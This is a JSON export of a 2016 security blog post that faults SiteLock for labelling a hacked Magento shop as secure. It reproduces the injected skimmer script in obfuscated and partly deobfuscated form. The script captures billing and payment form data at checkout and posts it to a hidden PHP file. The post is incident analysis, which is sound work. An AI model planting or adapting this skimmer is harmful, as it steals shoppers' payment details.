{"id":2585,"date":"2016-02-26T16:45:34","date_gmt":"2016-02-26T23:45:34","guid":{"rendered":"http:\/\/www.whitefirdesign.com\/blog\/?p=2585"},"modified":"2016-09-19T16:47:26","modified_gmt":"2016-09-19T22:47:26","slug":"sitelock-labels-website-as-secure-despite-being-very-dangerous-for-visitors","status":"publish","type":"post","link":"https:\/\/www.whitefirdesign.com\/blog\/2016\/02\/26\/sitelock-labels-website-as-secure-despite-being-very-dangerous-for-visitors\/","title":{"rendered":"SiteLock Labels Website as Secure Despite Being Very Dangerous For Visitors"},"content":{"rendered":"<p>When it comes to the poor state of security for websites, a lot of the blame for that probably\u00a0belongs to the\u00a0security companies, that\u00a0don&#8217;t seem to have much concern for security. One of the worst offenders is the\u00a0purveyors of website security or trust seals, that claim that websites are secure. Those companies seem to be mainly interested in\u00a0selling the idea that their customer&#8217;s websites are secure, without being too concerned whether they are or not (in some cases <a href=\"http:\/\/www.whitefirdesign.com\/blog\/2014\/09\/12\/trust-guard-and-the-false-security-of-trust-seals\/#comments\">placing their seals on website they know are not secure<\/a>).<\/p>\n<p>Several times in the past we have noted instances where websites we were working on, in which one of these companies, SiteLock, was <a href=\"http:\/\/www.whitefirdesign.com\/blog\/2014\/09\/03\/sitelock-fails-to-do-basic-security-check\/\">labeling the websites as being secure<\/a> <a href=\"http:\/\/www.whitefirdesign.com\/blog\/2015\/03\/10\/sitelock-still-failing-to-do-basic-security-check\/\">despite the fact the websites were running outdated software with known security vulnerabilities<\/a>. That being despite the ease it would be to check for the use of outdated software. In the latest case we are working on a\u00a0website they label as being secure<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-2589\" src=\"https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/SiteLock-SECURE-seal.png\" alt=\"SiteLock SECURE seal\" width=\"400\" height=\"400\" srcset=\"https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/SiteLock-SECURE-seal.png 400w, https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/SiteLock-SECURE-seal-150x150.png 150w, https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/SiteLock-SECURE-seal-300x300.png 300w\" sizes=\"auto, (max-width: 400px) 85vw, 400px\" \/><\/p>\n<p>despite the fact that the website had been hacked and contained code on its webpages that compromised any information entered on the checkout section of the website. If that doesn&#8217;t make a website insecure, we are not sure what would.<\/p>\n<p>What makes it stick out even more is that the code wasn&#8217;t hidden, it was sitting at the bottom of the page right below the code for SiteLock seal:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-2591\" src=\"https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/malicious-code-below-sitelock-code.png\" alt=\"&lt;div id=&quot;sitelock_shield_logo&quot; class=&quot;fixed_btm&quot; style=&quot;bottom:0;position:fixed;_position:absolute;right:0;&quot;&gt;&lt;a href=&quot;https:\/\/www.sitelock.com\/verify.php?site=[redacted]&quot; onclick=&quot;window.open('https:\/\/www.sitelock.com\/verify.php?site=[redacted]','SiteLock','width=600,height=600,left=160,top=170');return false;&quot; &gt;&lt;img alt=&quot;SiteLock&quot; title=&quot;SiteLock&quot; src=&quot;\/\/shield.sitelock.com\/shield\/[redacted]&quot;&gt;&lt;\/a&gt;&lt;\/div&gt;&lt;script&gt;var _0x1137=[&quot;\\x63\\x6C\\x69\\x63\\x6B&quot;,&quot;\\x2F\\x6D\\x65\\x64\\x69\\x61\\x2F\\x63\\x61\\x74\\x61\\x6C\\x6F\\x67\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x2F\\x63\\x61\\x63\\x68\\x65\\x2F\\x31\\x2F\\x74\\x68\\x75\\x6D\\x62\\x6E\\x61\\x69\\x6C\\x2F\\x37\\x30\\x30\\x78\\x2F\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2F\\x42\\x2F\\x57\\x2F\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2E\\x70\\x68\\x70&quot;,&quot;\\x50\\x4F\\x53\\x54&quot;,&quot;\\x66\\x6F\\x72\\x6D&quot;,&quot;\\x73\\x65\\x72\\x69\\x61\\x6C\\x69\\x7A\\x65&quot;,&quot;\\x61\\x6A\\x61\\x78&quot;,&quot;\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72&quot;,&quot;\\x5B\\x6F\\x6E\\x63\\x6C\\x69\\x63\\x6B\\x3D\\x27\\x62\\x69\\x6C\\x6C\\x69\\x6E\\x67\\x2E\\x73\\x61\\x76\\x65\\x28\\x29\\x27\\x5D&quot;,&quot;\\x63\\x68\\x65\\x63\\x6B\\x6F\\x75\\x74\\x2D\\x73\\x74\\x65\\x70\\x2D\\x62\\x69\\x6C\\x6C\\x69\\x6E\\x67&quot;,&quot;\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x42\\x79\\x49\\x64&quot;,&quot;\\x5B\\x6F\\x6E\\x63\\x6C\\x69\\x63\\x6B\\x3D\\x27\\x70\\x61\\x79\\x6D\\x65\\x6E\\x74\\x2E\\x73\\x61\\x76\\x65\\x28\\x29\\x27\\x5D&quot;,&quot;\\x63\\x68\\x65\\x63\\x6B\\x6F\\x75\\x74\\x2D\\x73\\x74\\x65\\x70\\x2D\\x70\\x61\\x79\\x6D\\x65\\x6E\\x74&quot;];function s1(){jQuery(_0x1137[7])[0][_0x1137[6]](_0x1137[0],function(){jQuery[_0x1137[5]]({url:_0x1137[1],type:_0x1137[2],data:Form[_0x1137[4]](billing[_0x1137[3]])})})}document[_0x1137[9]](_0x1137[8])[_0x1137[6]](_0x1137[0],s1());function s2(){jQuery(_0x1137[10])[0][_0x1137[6]](_0x1137[0],function(){jQuery[_0x1137[5]]({url:_0x1137[1],type:_0x1137[2],data:Form[_0x1137[4]](payment[_0x1137[3]])})})}document[_0x1137[9]](_0x1137[11])[_0x1137[6]](_0x1137[0],s2());&lt;\/script&gt;&lt;\/body&gt; &lt;\/html&gt;\" width=\"817\" height=\"374\" srcset=\"https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/malicious-code-below-sitelock-code.png 817w, https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/malicious-code-below-sitelock-code-300x137.png 300w, https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/malicious-code-below-sitelock-code-768x352.png 768w\" sizes=\"auto, (max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 984px) 61vw, (max-width: 1362px) 45vw, 600px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>The code is also stored right along side the SiteLock seal code in the website&#8217;s database:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-2593\" src=\"https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/malicious-code-below-sitelock-code-in-database.png\" alt=\"malicious-code-below-sitelock-code-in-database\" width=\"717\" height=\"689\" srcset=\"https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/malicious-code-below-sitelock-code-in-database.png 717w, https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/malicious-code-below-sitelock-code-in-database-300x288.png 300w\" sizes=\"auto, (max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 984px) 61vw, (max-width: 1362px) 45vw, 600px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>The code is slightly obfuscated, which we would assume would make a good malicious code scanning tool (if one actually exists) more suspicious of it, but it shouldn&#8217;t be anything that should be a problem for one to deobfuscate. When that is done you can see that code watches for some actions being taken in the Magento checkout process and then transmit the data being entered to another file on the website for later retrieval by the hacker:<\/p>\n<pre>&lt;script&gt;var _0x1137=[\"click\",\"\/media\/catalog\/product\/cache\/1\/thumbnail\/700x\/2bf8f2b8d028cce96\/B\/W\/da41803cc984b8c.php\",\"POST\",\"form\",\"serialize\",\"ajax\",\"addEventListener\",\"[onclick='billing.save()']\",\"checkout-step-billing\",\"getElementById\",\"[onclick='payment.save()']\",\"checkout-step-payment\"];function s1(){jQuery([onclick='billing.save()'])[0][addEventListener](click,function(){jQuery[serialize]({url:\/media\/catalog\/product\/cache\/1\/thumbnail\/700x\/2bf8f2b8d028cce96\/B\/W\/da41803cc984b8c.php,type:POST,data:Form[serialize](billing[form])})})}document[getElementById](checkout-step-billing)[addEventListener](click,s1());function s2(){jQuery([onclick='payment.save()'])[0][addEventListener](click,function(){jQuery[serialize]({url:\/media\/catalog\/product\/cache\/1\/thumbnail\/700x\/2bf8f2b8d028cce96\/B\/W\/da41803cc984b8c.php,type:POST,data:Form[serialize](payment[form])})})}document[getElementById](checkout-step-payment)[addEventListener](click,s2());&lt;\/script&gt;\r\n<\/pre>\n<p>If you are relying on SiteLock to keep your website secure, now would be a good time to stop that and instead focus on making sure you <a href=\"http:\/\/www.whitefirdesign.com\/resources\/secure-your-website-from-hackers.html\">take the steps that will actually keep your website secure<\/a>. (In this case the website was hacked due to Magento not being kept up to date.)<\/p>\n<p>While we are discussing SiteLock it also worth mentioning the fact that <a href=\"http:\/\/www.whitefirdesign.com\/blog\/2014\/09\/25\/sitelock-doesnt-do-basic-part-of-proper-hack-cleanup\/\">they also don&#8217;t properly clean up hacked websites<\/a>, but do\u00a0<a href=\"http:\/\/www.whitefirdesign.com\/blog\/2015\/06\/03\/sitelock-also-managed-to-break-a-website\/\">manage to break them<\/a>\u00a0when doing a less they should be.<\/p>\n<p>Despite their abysmal record, SiteLock claims\u00a0to be &#8220;The Global Leader in\u00a0Website Security&#8221; (how much worse much worse at website security must they think their competitors are?):<\/p>\n<p>[The following image is missing <a href=\"http:\/\/www.whitefirdesign.com\/blog\/2016\/09\/19\/sitelock-filed-a-dmca-takedown-notice-against-our-website-for-a-screenshot-of-their-homepage\/\">because SiteLock doesn&#8217;t want to you to be able see what the homepage of their websites looks like<\/a>.]<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-2594\" src=\"https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/sitelock-global-leader.png\" alt=\"sitelock-global-leader\" width=\"1024\" height=\"651\" srcset=\"https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/sitelock-global-leader.png 1024w, https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/sitelock-global-leader-300x191.png 300w, https:\/\/www.whitefirdesign.com\/blog\/wp-content\/uploads\/2016\/02\/sitelock-global-leader-768x488.png 768w\" sizes=\"auto, (max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 1362px) 62vw, 840px\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>When it comes to the poor state of security for websites, a lot of the blame for that probably\u00a0belongs to the\u00a0security companies, that\u00a0don&#8217;t seem to have much concern for security. One of the worst offenders is the\u00a0purveyors of website security or trust seals, that claim that websites are secure. Those companies seem to be mainly &hellip; <a href=\"https:\/\/www.whitefirdesign.com\/blog\/2016\/02\/26\/sitelock-labels-website-as-secure-despite-being-very-dangerous-for-visitors\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;SiteLock Labels Website as Secure Despite Being Very Dangerous For Visitors&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[25],"tags":[39],"class_list":["post-2585","post","type-post","status-publish","format-standard","hentry","category-bad-security","tag-sitelock"],"_links":{"self":[{"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/posts\/2585","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/comments?post=2585"}],"version-history":[{"count":8,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/posts\/2585\/revisions"}],"predecessor-version":[{"id":2890,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/posts\/2585\/revisions\/2890"}],"wp:attachment":[{"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/media?parent=2585"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/categories?post=2585"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.whitefirdesign.com\/blog\/wp-json\/wp\/v2\/tags?post=2585"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}